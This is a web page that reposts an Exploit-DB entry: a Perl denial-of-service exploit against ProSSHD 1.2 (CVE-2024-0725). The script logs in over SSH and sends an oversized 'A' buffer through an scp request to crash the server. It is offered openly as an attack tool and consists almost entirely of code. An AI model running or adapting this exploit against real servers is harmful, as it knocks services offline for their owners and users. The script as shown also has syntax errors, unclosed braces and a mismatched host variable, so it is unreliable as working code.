ProSSHD 1.2 20090726 – Denial of Service (DoS) - 体验盒子

作者： Fernando Mengali

日期： 2025-06-09

类别：

remote

平台：

windows

来源：https://www.exploit-db.com/exploits/52321/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

# Exploit Title: ProSSHD 1.2 20090726 - Denial of Service (DoS)

# Google Dork: N/A

# Date: 13 january 2024

# Exploit Author: Fernando Mengali

# Vendor Homepage: https://prosshd.com/

# Software Link: N/A

# Version: 1.2 20090726

# Tested on: Windows XP

# CVE: CVE-2024-0725

$sis="$^O";

if ($sis eq "windows"){

$cmd="cls";

} else {s

$cmd="clear";

}

system("$cmd");

intro();

main();

print "\t==> Connecting to webserver... \n\n";

sleep(1);

my $i=0;

print "\t==> Exploiting... \n\n";

my $payload= "\x41" x 500;

$connection2 = Net::SSH2->new();

$connection2->connect($host, $port) || die "\nError: Connection Refused!\n";

$connection2->auth_password($username, $password) || die "\nError: Username/Password Denied!\n";

$scpget = $connection2->scp_get($payload);

$connection2->disconnect();

print "\t==> Done! Exploited!";

sub intro {

print q {

,--,

_ ___/ /\|

,;'( )__, )~

//// '--;

' \ | ^

^^

[+] ProSSHD 1.2 20090726 - Denial of Service (DoS)

[*] Coded by Fernando Mengali

[@] e-mail: fernando.mengalli@gmail.com

}

sub main {

our ($ip, $port, $username, $password) = @ARGV;

unless (defined($ip) && defined($port)) {

print "\n\tUsage: $0 <ip> <port> <username> <password> \n";

exit(-1);

}